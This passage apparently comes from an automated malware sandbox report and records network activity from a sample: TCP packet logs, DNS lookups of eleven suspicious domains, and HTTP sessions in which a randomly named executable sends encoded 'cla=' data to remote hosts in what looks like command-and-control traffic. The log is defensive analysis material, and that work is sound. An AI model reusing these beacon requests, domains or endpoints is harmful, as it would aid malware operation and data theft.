Nov 22, 2024 07:57:07.826071024 CET  50004     80        192.168.2.5      8.210.114.150
Nov 22, 2024 07:57:07.839998007 CET  50004     80        192.168.2.5      8.210.114.150
Nov 22, 2024 07:57:07.959990978 CET  80        50004     8.210.114.150    192.168.2.5
Nov 22, 2024 07:57:07.960050106 CET  80        50004     8.210.114.150    192.168.2.5
Nov 22, 2024 07:57:09.356528044 CET  50004     80        192.168.2.5      8.210.114.150
Nov 22, 2024 07:57:09.494505882 CET  80        50004     8.210.114.150    192.168.2.5
Nov 22, 2024 07:57:09.494566917 CET  80        50004     8.210.114.150    192.168.2.5
Nov 22, 2024 07:57:09.494596004 CET  80        50004     8.210.114.150    192.168.2.5
Nov 22, 2024 07:57:09.494837999 CET  50004     80        192.168.2.5      8.210.114.150
Nov 22, 2024 07:57:09.494838953 CET  50004     80        192.168.2.5      8.210.114.150
Nov 22, 2024 07:57:09.494838953 CET  50004     80        192.168.2.5      8.210.114.150
Nov 22, 2024 07:57:10.382211924 CET  50005     80        192.168.2.5      8.210.114.150
Nov 22, 2024 07:57:10.502245903 CET  80        50005     8.210.114.150    192.168.2.5
Nov 22, 2024 07:57:10.502640963 CET  50005     80        192.168.2.5      8.210.114.150
Nov 22, 2024 07:57:10.511018991 CET  50005     80        192.168.2.5      8.210.114.150
Nov 22, 2024 07:57:10.630611897 CET  80        50005     8.210.114.150    192.168.2.5
Nov 22, 2024 07:57:12.240935087 CET  80        50005     8.210.114.150    192.168.2.5
Nov 22, 2024 07:57:12.240986109 CET  80        50005     8.210.114.150    192.168.2.5
Nov 22, 2024 07:57:12.241240025 CET  50005     80        192.168.2.5      8.210.114.150
Nov 22, 2024 07:57:12.243947983 CET  50005     80        192.168.2.5      8.210.114.150
Nov 22, 2024 07:57:12.363596916 CET  80        50005     8.210.114.150    192.168.2.5
Nov 22, 2024 07:57:17.562948942 CET  50006     80        192.168.2.5      172.67.209.48
Nov 22, 2024 07:57:17.682557106 CET  80        50006     172.67.209.48    192.168.2.5
Nov 22, 2024 07:57:17.682801962 CET  50006     80        192.168.2.5      172.67.209.48
Nov 22, 2024 07:57:17.701783895 CET  50006     80        192.168.2.5      172.67.209.48
Nov 22, 2024 07:57:17.821422100 CET  80        50006     172.67.209.48    192.168.2.5
Nov 22, 2024 07:57:18.847464085 CET  80        50006     172.67.209.48    192.168.2.5
Nov 22, 2024 07:57:18.847489119 CET  80        50006     172.67.209.48    192.168.2.5
Nov 22, 2024 07:57:18.847604036 CET  50006     80        192.168.2.5      172.67.209.48
Nov 22, 2024 07:57:18.847660065 CET  80        50006     172.67.209.48    192.168.2.5
Nov 22, 2024 07:57:18.847791910 CET  80        50006     172.67.209.48    192.168.2.5
Nov 22, 2024 07:57:18.847855091 CET  50006     80        192.168.2.5      172.67.209.48
Nov 22, 2024 07:57:19.215856075 CET  50006     80        192.168.2.5      172.67.209.48
Nov 22, 2024 07:57:20.234031916 CET  50007     80        192.168.2.5      172.67.209.48
Nov 22, 2024 07:57:20.353907108 CET  80        50007     172.67.209.48    192.168.2.5
Nov 22, 2024 07:57:20.354029894 CET  50007     80        192.168.2.5      172.67.209.48
Nov 22, 2024 07:57:20.368664026 CET  50007     80        192.168.2.5      172.67.209.48
Nov 22, 2024 07:57:20.488280058 CET  80        50007     172.67.209.48    192.168.2.5
Nov 22, 2024 07:57:21.564651012 CET  80        50007     172.67.209.48    192.168.2.5
Nov 22, 2024 07:57:21.564688921 CET  80        50007     172.67.209.48    192.168.2.5
Nov 22, 2024 07:57:21.564718962 CET  80        50007     172.67.209.48    192.168.2.5
Nov 22, 2024 07:57:21.564754009 CET  50007     80        192.168.2.5      172.67.209.48
Nov 22, 2024 07:57:21.564846039 CET  50007     80        192.168.2.5      172.67.209.48
Nov 22, 2024 07:57:21.872179031 CET  50007     80        192.168.2.5      172.67.209.48
Nov 22, 2024 07:57:22.890986919 CET  50008     80        192.168.2.5      172.67.209.48
Nov 22, 2024 07:57:23.010763884 CET  80        50008     172.67.209.48    192.168.2.5
Nov 22, 2024 07:57:23.011101007 CET  50008     80        192.168.2.5      172.67.209.48
Nov 22, 2024 07:57:23.025753021 CET  50008     80        192.168.2.5      172.67.209.48
Nov 22, 2024 07:57:23.145442009 CET  80        50008     172.67.209.48    192.168.2.5
Nov 22, 2024 07:57:23.145462036 CET  80        50008     172.67.209.48    192.168.2.5
Nov 22, 2024 07:57:24.179091930 CET  80        50008     172.67.209.48    192.168.2.5
Nov 22, 2024 07:57:24.179580927 CET  80        50008     172.67.209.48    192.168.2.5
Nov 22, 2024 07:57:24.179696083 CET  80        50008     172.67.209.48    192.168.2.5
Nov 22, 2024 07:57:24.179761887 CET  50008     80        192.168.2.5      172.67.209.48
Nov 22, 2024 07:57:24.179761887 CET  50008     80        192.168.2.5      172.67.209.48
Nov 22, 2024 07:57:24.528310061 CET  50008     80        192.168.2.5      172.67.209.48
Nov 22, 2024 07:57:25.547269106 CET  50009     80        192.168.2.5      172.67.209.48
Nov 22, 2024 07:57:25.666943073 CET  80        50009     172.67.209.48    192.168.2.5
Nov 22, 2024 07:57:25.667016983 CET  50009     80        192.168.2.5      172.67.209.48
Nov 22, 2024 07:57:25.676951885 CET  50009     80        192.168.2.5      172.67.209.48
Nov 22, 2024 07:57:25.796437979 CET  80        50009     172.67.209.48    192.168.2.5
Nov 22, 2024 07:57:26.873251915 CET  80        50009     172.67.209.48    192.168.2.5
Nov 22, 2024 07:57:26.873310089 CET  80        50009     172.67.209.48    192.168.2.5
Nov 22, 2024 07:57:26.873343945 CET  80        50009     172.67.209.48    192.168.2.5
Nov 22, 2024 07:57:26.873409986 CET  50009     80        192.168.2.5      172.67.209.48
Nov 22, 2024 07:57:26.873482943 CET  50009     80        192.168.2.5      172.67.209.48
Nov 22, 2024 07:57:26.876086950 CET  50009     80        192.168.2.5      172.67.209.48
Nov 22, 2024 07:57:26.996062994 CET  80        50009     172.67.209.48    192.168.2.5
Nov 22, 2024 07:57:32.393095970 CET  50010     80        192.168.2.5      209.74.77.109
Nov 22, 2024 07:57:32.512927055 CET  80        50010     209.74.77.109    192.168.2.5
Nov 22, 2024 07:57:32.513134003 CET  50010     80        192.168.2.5      209.74.77.109
Nov 22, 2024 07:57:32.527621984 CET  50010     80        192.168.2.5      209.74.77.109
Nov 22, 2024 07:57:32.647500038 CET  80        50010     209.74.77.109    192.168.2.5
Nov 22, 2024 07:57:33.739012003 CET  80        50010     209.74.77.109    192.168.2.5
Nov 22, 2024 07:57:33.739051104 CET  80        50010     209.74.77.109    192.168.2.5
Nov 22, 2024 07:57:33.739104986 CET  50010     80        192.168.2.5      209.74.77.109
Nov 22, 2024 07:57:34.043932915 CET  50010     80        192.168.2.5      209.74.77.109
Nov 22, 2024 07:57:35.062566996 CET  50011     80        192.168.2.5      209.74.77.109
Nov 22, 2024 07:57:35.182300091 CET  80        50011     209.74.77.109    192.168.2.5
Nov 22, 2024 07:57:35.182465076 CET  50011     80        192.168.2.5      209.74.77.109
Nov 22, 2024 07:57:35.197118044 CET  50011     80        192.168.2.5      209.74.77.109
Nov 22, 2024 07:57:35.317333937 CET  80        50011     209.74.77.109    192.168.2.5
Nov 22, 2024 07:57:36.404454947 CET  80        50011     209.74.77.109    192.168.2.5
Nov 22, 2024 07:57:36.404567003 CET  80        50011     209.74.77.109    192.168.2.5
Nov 22, 2024 07:57:36.404742002 CET  50011     80        192.168.2.5      209.74.77.109
Nov 22, 2024 07:57:36.700191975 CET  50011     80        192.168.2.5      209.74.77.109
Nov 22, 2024 07:57:37.718863964 CET  50012     80        192.168.2.5      209.74.77.109
Nov 22, 2024 07:57:37.838702917 CET  80        50012     209.74.77.109    192.168.2.5
Nov 22, 2024 07:57:37.838810921 CET  50012     80        192.168.2.5      209.74.77.109
Nov 22, 2024 07:57:37.855245113 CET  50012     80        192.168.2.5      209.74.77.109
Nov 22, 2024 07:57:38.106501102 CET  50012     80        192.168.2.5      209.74.77.109
Nov 22, 2024 07:57:38.465593100 CET  80        50012     209.74.77.109    192.168.2.5
Nov 22, 2024 07:57:38.465637922 CET  80        50012     209.74.77.109    192.168.2.5
Nov 22, 2024 07:57:38.465651989 CET  80        50012     209.74.77.109    192.168.2.5
Nov 22, 2024 07:57:39.107515097 CET  80        50012     209.74.77.109    192.168.2.5
Nov 22, 2024 07:57:39.107625008 CET  80        50012     209.74.77.109    192.168.2.5
Nov 22, 2024 07:57:39.107716084 CET  50012     80        192.168.2.5      209.74.77.109
Nov 22, 2024 07:57:39.356439114 CET  50012     80        192.168.2.5      209.74.77.109
Nov 22, 2024 07:57:40.376106024 CET  50013     80        192.168.2.5      209.74.77.109
                                                                                                            Nov 22, 2024 07:57:40.495898008 CET8050013209.74.77.109192.168.2.5
                                                                                                            Nov 22, 2024 07:57:40.495986938 CET5001380192.168.2.5209.74.77.109
                                                                                                            Nov 22, 2024 07:57:40.504962921 CET5001380192.168.2.5209.74.77.109
                                                                                                            Nov 22, 2024 07:57:40.624572992 CET8050013209.74.77.109192.168.2.5
                                                                                                            Nov 22, 2024 07:57:41.774331093 CET8050013209.74.77.109192.168.2.5
                                                                                                            Nov 22, 2024 07:57:41.774363995 CET8050013209.74.77.109192.168.2.5
                                                                                                            Nov 22, 2024 07:57:41.774527073 CET5001380192.168.2.5209.74.77.109
                                                                                                            Nov 22, 2024 07:57:41.798686028 CET5001380192.168.2.5209.74.77.109
                                                                                                            Nov 22, 2024 07:57:41.918247938 CET8050013209.74.77.109192.168.2.5
                                                                                                            Nov 22, 2024 07:57:47.383517027 CET5001480192.168.2.5161.97.142.144
                                                                                                            Nov 22, 2024 07:57:47.503209114 CET8050014161.97.142.144192.168.2.5
                                                                                                            Nov 22, 2024 07:57:47.506076097 CET5001480192.168.2.5161.97.142.144
                                                                                                            Nov 22, 2024 07:57:47.521241903 CET5001480192.168.2.5161.97.142.144
                                                                                                            Nov 22, 2024 07:57:47.640888929 CET8050014161.97.142.144192.168.2.5
                                                                                                            Nov 22, 2024 07:57:48.796672106 CET8050014161.97.142.144192.168.2.5
                                                                                                            Nov 22, 2024 07:57:48.796721935 CET8050014161.97.142.144192.168.2.5
                                                                                                            Nov 22, 2024 07:57:48.796772003 CET8050014161.97.142.144192.168.2.5
                                                                                                            Nov 22, 2024 07:57:48.796785116 CET5001480192.168.2.5161.97.142.144
                                                                                                            Nov 22, 2024 07:57:48.796871901 CET5001480192.168.2.5161.97.142.144
                                                                                                            Nov 22, 2024 07:57:49.028439999 CET5001480192.168.2.5161.97.142.144
                                                                                                            Nov 22, 2024 07:57:50.312525034 CET5001580192.168.2.5161.97.142.144
                                                                                                            Nov 22, 2024 07:57:50.432476997 CET8050015161.97.142.144192.168.2.5
                                                                                                            Nov 22, 2024 07:57:50.432823896 CET5001580192.168.2.5161.97.142.144
                                                                                                            Nov 22, 2024 07:57:50.447796106 CET5001580192.168.2.5161.97.142.144
                                                                                                            Nov 22, 2024 07:57:50.567420006 CET8050015161.97.142.144192.168.2.5
                                                                                                            Nov 22, 2024 07:57:51.769519091 CET8050015161.97.142.144192.168.2.5
                                                                                                            Nov 22, 2024 07:57:51.769551992 CET8050015161.97.142.144192.168.2.5
                                                                                                            Nov 22, 2024 07:57:51.769568920 CET8050015161.97.142.144192.168.2.5
                                                                                                            Nov 22, 2024 07:57:51.769615889 CET5001580192.168.2.5161.97.142.144
                                                                                                            Nov 22, 2024 07:57:51.769850016 CET5001580192.168.2.5161.97.142.144
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 22, 2024 07:55:09.553816080 CET | 50889 | 53 | 192.168.2.5 | 1.1.1.1
Nov 22, 2024 07:55:10.497601032 CET | 53 | 50889 | 1.1.1.1 | 192.168.2.5
Nov 22, 2024 07:55:27.382989883 CET | 57951 | 53 | 192.168.2.5 | 1.1.1.1
Nov 22, 2024 07:55:28.232800007 CET | 53 | 57951 | 1.1.1.1 | 192.168.2.5
Nov 22, 2024 07:55:43.016285896 CET | 52372 | 53 | 192.168.2.5 | 1.1.1.1
Nov 22, 2024 07:55:43.782174110 CET | 53 | 52372 | 1.1.1.1 | 192.168.2.5
Nov 22, 2024 07:55:58.313363075 CET | 65226 | 53 | 192.168.2.5 | 1.1.1.1
Nov 22, 2024 07:55:59.309575081 CET | 65226 | 53 | 192.168.2.5 | 1.1.1.1
Nov 22, 2024 07:55:59.481560946 CET | 53 | 65226 | 1.1.1.1 | 192.168.2.5
Nov 22, 2024 07:55:59.481604099 CET | 53 | 65226 | 1.1.1.1 | 192.168.2.5
Nov 22, 2024 07:56:14.032087088 CET | 56529 | 53 | 192.168.2.5 | 1.1.1.1
Nov 22, 2024 07:56:14.976993084 CET | 53 | 56529 | 1.1.1.1 | 192.168.2.5
Nov 22, 2024 07:56:29.531847000 CET | 55787 | 53 | 192.168.2.5 | 1.1.1.1
Nov 22, 2024 07:56:30.544394970 CET | 55787 | 53 | 192.168.2.5 | 1.1.1.1
Nov 22, 2024 07:56:30.649960041 CET | 53 | 55787 | 1.1.1.1 | 192.168.2.5
Nov 22, 2024 07:56:30.681937933 CET | 53 | 55787 | 1.1.1.1 | 192.168.2.5
Nov 22, 2024 07:56:45.312405109 CET | 56528 | 53 | 192.168.2.5 | 1.1.1.1
Nov 22, 2024 07:56:46.080504894 CET | 53 | 56528 | 1.1.1.1 | 192.168.2.5
Nov 22, 2024 07:57:01.625462055 CET | 51134 | 53 | 192.168.2.5 | 1.1.1.1
Nov 22, 2024 07:57:02.369574070 CET | 53 | 51134 | 1.1.1.1 | 192.168.2.5
Nov 22, 2024 07:57:17.251210928 CET | 55535 | 53 | 192.168.2.5 | 1.1.1.1
Nov 22, 2024 07:57:17.558016062 CET | 53 | 55535 | 1.1.1.1 | 192.168.2.5
Nov 22, 2024 07:57:31.891676903 CET | 59157 | 53 | 192.168.2.5 | 1.1.1.1
Nov 22, 2024 07:57:32.390450001 CET | 53 | 59157 | 1.1.1.1 | 192.168.2.5
Nov 22, 2024 07:57:46.813355923 CET | 60425 | 53 | 192.168.2.5 | 1.1.1.1
Nov 22, 2024 07:57:47.287425041 CET | 53 | 60425 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 22, 2024 07:55:09.553816080 CET | 192.168.2.5 | 1.1.1.1 | 0x8b4a | Standard query (0) | www.rtpterbaruwaktu3.xyz | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:55:27.382989883 CET | 192.168.2.5 | 1.1.1.1 | 0x4c58 | Standard query (0) | www.70kdd.top | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:55:43.016285896 CET | 192.168.2.5 | 1.1.1.1 | 0x72b0 | Standard query (0) | www.acond-22-mvr.click | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:55:58.313363075 CET | 192.168.2.5 | 1.1.1.1 | 0xcfc3 | Standard query (0) | www.smartcongress.net | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:55:59.309575081 CET | 192.168.2.5 | 1.1.1.1 | 0xcfc3 | Standard query (0) | www.smartcongress.net | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:56:14.032087088 CET | 192.168.2.5 | 1.1.1.1 | 0xbc8f | Standard query (0) | www.mrpokrovskii.pro | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:56:29.531847000 CET | 192.168.2.5 | 1.1.1.1 | 0xc3bb | Standard query (0) | www.ytsd88.top | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:56:30.544394970 CET | 192.168.2.5 | 1.1.1.1 | 0xc3bb | Standard query (0) | www.ytsd88.top | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:56:45.312405109 CET | 192.168.2.5 | 1.1.1.1 | 0xf6f5 | Standard query (0) | www.matteicapital.online | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:57:01.625462055 CET | 192.168.2.5 | 1.1.1.1 | 0x9e89 | Standard query (0) | www.llljjjiii.shop | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:57:17.251210928 CET | 192.168.2.5 | 1.1.1.1 | 0x5aa6 | Standard query (0) | www.ampsamkok88.shop | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:57:31.891676903 CET | 192.168.2.5 | 1.1.1.1 | 0x274a | Standard query (0) | www.gogawithme.live | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:57:46.813355923 CET | 192.168.2.5 | 1.1.1.1 | 0xb942 | Standard query (0) | www.54248711.xyz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 22, 2024 07:55:10.497601032 CET | 1.1.1.1 | 192.168.2.5 | 0x8b4a | No error (0) | www.rtpterbaruwaktu3.xyz | rtpterbaruwaktu3.xyz | | CNAME (Canonical name) | IN (0x0001) | false
Nov 22, 2024 07:55:10.497601032 CET | 1.1.1.1 | 192.168.2.5 | 0x8b4a | No error (0) | rtpterbaruwaktu3.xyz | | 103.21.221.87 | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:55:28.232800007 CET | 1.1.1.1 | 192.168.2.5 | 0x4c58 | No error (0) | www.70kdd.top | 70kdd.top | | CNAME (Canonical name) | IN (0x0001) | false
Nov 22, 2024 07:55:28.232800007 CET | 1.1.1.1 | 192.168.2.5 | 0x4c58 | No error (0) | 70kdd.top | | 38.47.232.124 | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:55:43.782174110 CET | 1.1.1.1 | 192.168.2.5 | 0x72b0 | No error (0) | www.acond-22-mvr.click | | 199.59.243.227 | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:55:59.481560946 CET | 1.1.1.1 | 192.168.2.5 | 0xcfc3 | No error (0) | www.smartcongress.net | smartcongress.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 22, 2024 07:55:59.481560946 CET | 1.1.1.1 | 192.168.2.5 | 0xcfc3 | No error (0) | smartcongress.net | | 146.88.233.115 | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:55:59.481604099 CET | 1.1.1.1 | 192.168.2.5 | 0xcfc3 | No error (0) | www.smartcongress.net | smartcongress.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 22, 2024 07:55:59.481604099 CET | 1.1.1.1 | 192.168.2.5 | 0xcfc3 | No error (0) | smartcongress.net | | 146.88.233.115 | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:56:14.976993084 CET | 1.1.1.1 | 192.168.2.5 | 0xbc8f | No error (0) | www.mrpokrovskii.pro | | 194.85.61.76 | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:56:14.976993084 CET | 1.1.1.1 | 192.168.2.5 | 0xbc8f | No error (0) | www.mrpokrovskii.pro | | 109.70.26.37 | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:56:30.649960041 CET | 1.1.1.1 | 192.168.2.5 | 0xc3bb | No error (0) | www.ytsd88.top | | 47.76.213.197 | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:56:30.681937933 CET | 1.1.1.1 | 192.168.2.5 | 0xc3bb | No error (0) | www.ytsd88.top | | 47.76.213.197 | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:56:46.080504894 CET | 1.1.1.1 | 192.168.2.5 | 0xf6f5 | No error (0) | www.matteicapital.online | | 208.91.197.27 | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:57:02.369574070 CET | 1.1.1.1 | 192.168.2.5 | 0x9e89 | No error (0) | www.llljjjiii.shop | | 8.210.114.150 | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:57:17.558016062 CET | 1.1.1.1 | 192.168.2.5 | 0x5aa6 | No error (0) | www.ampsamkok88.shop | | 172.67.209.48 | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:57:17.558016062 CET | 1.1.1.1 | 192.168.2.5 | 0x5aa6 | No error (0) | www.ampsamkok88.shop | | 104.21.15.243 | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:57:32.390450001 CET | 1.1.1.1 | 192.168.2.5 | 0x274a | No error (0) | www.gogawithme.live | | 209.74.77.109 | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:57:47.287425041 CET | 1.1.1.1 | 192.168.2.5 | 0xb942 | No error (0) | www.54248711.xyz | | 161.97.142.144 | A (IP address) | IN (0x0001) | false
• www.rtpterbaruwaktu3.xyz
• www.70kdd.top
• www.acond-22-mvr.click
• www.smartcongress.net
• www.mrpokrovskii.pro
• www.ytsd88.top
• www.matteicapital.online
• www.llljjjiii.shop
• www.ampsamkok88.shop
• www.gogawithme.live
• www.54248711.xyz
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49726 | 103.21.221.87 | 80 | 2128 | C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 07:55:10.634231091 CET | 358 | OUT | GET /7yx4/?jbeXk=EHbdQPuX&cla=m5A4fx9ZIvMjycGMPfzrz9w2buYwlryi7dKiWry0Mz65334dxjvJlwP/oWrLHd67Yf3RW+voxQmVQwC1SSJQaxXxx2OcYdqfi9qgQF3SHTlHdwLQ+7ODGDyF3UwRNLbgag== HTTP/1.1
Host: www.rtpterbaruwaktu3.xyz
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Nov 22, 2024 07:55:12.263582945 CET | 1033 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 796
date: Fri, 22 Nov 2024 06:55:11 GMT
server: LiteSpeed
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49767 | 38.47.232.124 | 80 | 2128 | C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 07:55:28.371376991 CET | 595 | OUT | POST /klhq/ HTTP/1.1
Host: www.70kdd.top
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Origin: http://www.70kdd.top
Cache-Control: max-age=0
Content-Length: 204
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.70kdd.top/klhq/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Data Raw: 63 6c 61 3d 4e 46 77 66 6f 58 62 65 63 77 61 77 57 5a 30 4c 72 69 44 39 76 66 6c 76 45 4d 36 6b 31 4e 44 55 63 30 6a 53 51 43 51 31 66 64 55 56 64 6d 76 4d 30 70 39 46 2f 34 34 75 45 44 33 77 61 6c 65 30 7a 54 72 39 6d 7a 2f 6d 68 41 57 70 63 73 31 75 47 50 52 6d 69 64 33 51 6b 58 78 68 6c 70 34 68 30 34 77 55 39 4b 58 4b 30 42 61 65 32 39 73 53 41 51 62 44 44 57 41 68 38 31 68 66 39 65 68 56 39 6f 36 73 38 46 42 41 62 73 5a 69 7a 51 30 4b 68 64 42 38 31 6e 74 65 46 6d 72 39 42 63 77 32 63 4c 46 4d 7a 71 53 38 62 36 45 71 67 62 71 59 68 4d 71 39 72 51 4a 47 65 42 72 6a 34 30 2b 78 58 33 6e 6a 2f 4a 67 3d
Data Ascii: cla=NFwfoXbecwawWZ0LriD9vflvEM6k1NDUc0jSQCQ1fdUVdmvM0p9F/44uED3wale0zTr9mz/mhAWpcs1uGPRmid3QkXxhlp4h04wU9KXK0Bae29sSAQbDDWAh81hf9ehV9o6s8FBAbsZizQ0KhdB81nteFmr9Bcw2cLFMzqS8b6EqgbqYhMq9rQJGeBrj40+xX3nj/Jg=
Nov 22, 2024 07:55:29.912131071 CET | 312 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 22 Nov 2024 06:55:29 GMT
Content-Type: text/html
Content-Length: 148
Connection: close
ETag: "66e01838-94"
Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49773 | 38.47.232.124 | 80 | 2128 | C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 07:55:31.045470953 CET | 615 | OUT | POST /klhq/ HTTP/1.1
Host: www.70kdd.top
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Origin: http://www.70kdd.top
Cache-Control: max-age=0
Content-Length: 224
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.70kdd.top/klhq/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Data Ascii: cla=NFwfoXbecwawX5kLpBr9/PloY86k+tDQc0/SQBduD+wVTk3M1o9F644uKj31F1eFzTnbmzDmhB2pcoxuG8IUiN3er3xj7Z4h04wU9KDg0BCe2t8SA0PcJ2Am1Vhf5ege9o6a8AZ6bpFizU4KiMB7+ntQIGqXGvJtR51y2p70Yp8SsNby7uiV4wl+OSjUpEfYNU3The3wid03rhJ0ClL9MgltiIqF
Nov 22, 2024 07:55:32.611973047 CET | 312 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 22 Nov 2024 06:55:32 GMT
Content-Type: text/html
Content-Length: 148
Connection: close
ETag: "66e01838-94"
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49779 | 38.47.232.124 | 80 | 2128 | C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 07:55:33.712275028 CET | 1632 | OUT | POST /klhq/ HTTP/1.1
Host: www.70kdd.top
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Origin: http://www.70kdd.top
Cache-Control: max-age=0
Content-Length: 1240
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.70kdd.top/klhq/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
